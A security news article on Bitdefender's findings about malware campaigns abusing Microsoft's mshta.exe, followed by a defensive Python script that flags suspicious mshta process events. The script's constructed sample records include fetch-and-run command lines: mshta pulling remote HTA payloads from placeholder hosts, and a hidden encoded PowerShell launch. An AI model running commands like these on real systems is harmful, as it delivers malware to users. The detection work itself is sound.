
Microsoft’s legacy mshta.exe utility remains widely abused in malware campaigns despite the retirement of Internet Explorer and Microsoft’s ongoing deprecation of older scripting technologies.
Bitdefender Labs reports a notable rise in detections involving mshta.exe over recent months, suggesting that attackers are increasingly relying on the LOLBIN (Living-off-the-Land binary) as legitimate enterprise use steadily declines.
MSHTA was originally tied to Internet Explorer and HTML Applications (HTA), but it remains included by default in Windows. Because the binary is Microsoft-signed and trusted by many security products and enterprise environments, attackers use it to blend malicious activity with legitimate system operations. Bitdefender says the tool is especially attractive because it can retrieve remote payloads, execute scripts in memory, and hand off execution to PowerShell or other Windows components without dropping obvious malware files onto disk.
Abuse of MSHTA in the wild
One of the largest infection clusters involved CountLoader, an HTA-based loader used to deliver LummaStealer and Amatera. Victims were lured through cracked software websites, SEO poisoning, and social media posts advertising pirated applications. Download archives contained a disguised Python interpreter, malicious Python scripts, and a renamed MSHTA executable called iso2022.exe.
The malicious Python script generated obfuscated command lines that launched MSHTA against attacker-controlled infrastructure using domains masquerading as legitimate services hosted on .cc domains, including google-services[.]cc and memory-scanner[.]cc. The HTA payload was then decoded and used to launch additional malware stages. Bitdefender said the infrastructure later evolved to use .vg and .gl domains such as explorer[.]vg, ccleaner[.]gl, and microservice[.]gl.
Another campaign analyzed by the researchers involved Emmenhtal Loader, which used ClickFix-style social engineering attacks distributed through Discord phishing messages. Victims were directed to fake CAPTCHA pages designed to copy malicious commands into the clipboard and trick users into manually executing them via the Windows Run dialog.
The malicious command launched mshta.exe against a remote HTA file disguised as media content, such as .mp4 files hosted on Alibaba Cloud infrastructure. The HTA payload operated entirely in memory, using hidden 1×1-pixel windows and Base64-obfuscated JavaScript loaders that eventually executed PowerShell commands. Those scripts downloaded additional payloads and executed .NET assemblies directly in memory, including LummaStealer samples containing known command-and-control infrastructure.
Bitdefender also documented MSHTA abuse in ClipBanker campaigns targeting cryptocurrency users. In those attacks, remote HTA scripts launched hidden PowerShell commands that downloaded secondary payloads designed to establish persistence, disable defenses, and replace cryptocurrency wallet addresses copied to the clipboard. The malware used scheduled tasks with names mimicking legitimate Windows services to avoid detection.
More advanced malware families are also relying on the utility. The researchers observed PurpleFox operators using MSHTA to launch msiexec commands that downloaded MSI installers disguised as PNG image files. Once installed, PurpleFox deployed a rootkit-enabled backdoor capable of persistence, remote command execution, information theft, and DDoS functionality.
Bitdefender says users should not assume all MSHTA usage is malicious, noting that some older software packages and administrative scripts still rely on it for automation tasks. However, the company recommends that organizations phase out the utility wherever possible and block or restrict mshta.exe and wscript.exe where they are no longer needed.
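As an added detection example (not from the Bitdefender report or this article), the following Python triages constructed process-creation records for the traits described above: a renamed mshta binary, mshta fetching a remote HTA (including one disguised with a media extension), and mshta handing execution to PowerShell or msiexec. Field names follow Sysmon Event ID 1 conventions; every path, domain and command line below is made up.

```python
import re

# Constructed Sysmon-style process-creation records (not real telemetry).
# OriginalFileName comes from the PE version resource, so a renamed copy of
# mshta.exe (e.g. iso2022.exe, as in the CountLoader campaign) still shows it.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe", "OriginalFileName": "mshta.exe",
     "CommandLine": r'mshta.exe "C:\Program Files\LegacyApp\setup.hta"',
     "ParentImage": r"C:\Program Files\LegacyApp\installer.exe"},  # legacy, local HTA
    {"Image": r"C:\Users\bob\Downloads\iso2022.exe", "OriginalFileName": "mshta.exe",
     "CommandLine": "iso2022.exe https://example-lure.invalid/a.hta",
     "ParentImage": r"C:\Users\bob\Downloads\python.exe"},
    {"Image": r"C:\Windows\System32\mshta.exe", "OriginalFileName": "mshta.exe",
     "CommandLine": "mshta https://cdn.example.invalid/video.mp4",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE",
     "CommandLine": "powershell -w hidden -enc PLACEHOLDER",
     "ParentImage": r"C:\Windows\System32\mshta.exe"},
    {"Image": r"C:\Windows\System32\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "CommandLine": "notepad.exe", "ParentImage": r"C:\Windows\explorer.exe"},
]

REMOTE_URL = re.compile(r"\b(?:https?|ftp)://\S+", re.IGNORECASE)
HANDOFF_CHILDREN = {"powershell.exe", "pwsh.exe", "cmd.exe",
                    "msiexec.exe", "wscript.exe", "cscript.exe"}

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def classify(event: dict) -> list[str]:
    """Return the suspicious traits found in one process-creation event."""
    findings = []
    is_mshta = event["OriginalFileName"].lower() == "mshta.exe"
    if is_mshta and basename(event["Image"]) != "mshta.exe":
        findings.append("renamed_mshta")
    m = REMOTE_URL.search(event["CommandLine"])
    if is_mshta and m:
        findings.append("remote_hta")  # payload fetched over the network, nothing on disk
        if not m.group(0).lower().endswith((".hta", ".htm", ".html")):
            findings.append("disguised_extension")  # e.g. an HTA served as .mp4 or .png
    if basename(event["ParentImage"]) == "mshta.exe" and basename(event["Image"]) in HANDOFF_CHILDREN:
        findings.append("mshta_handoff")  # HTA handing execution to PowerShell, msiexec, etc.
    return findings

def triage(events: list[dict]) -> dict[str, list[str]]:
    """Map each event's command line to its findings; events with none are omitted."""
    return {e["CommandLine"]: f for e in events if (f := classify(e))}
```

The first record, a local HTA run by a legacy installer, produces no findings, which is the allow-list case the article warns about when it says not all MSHTA use is malicious.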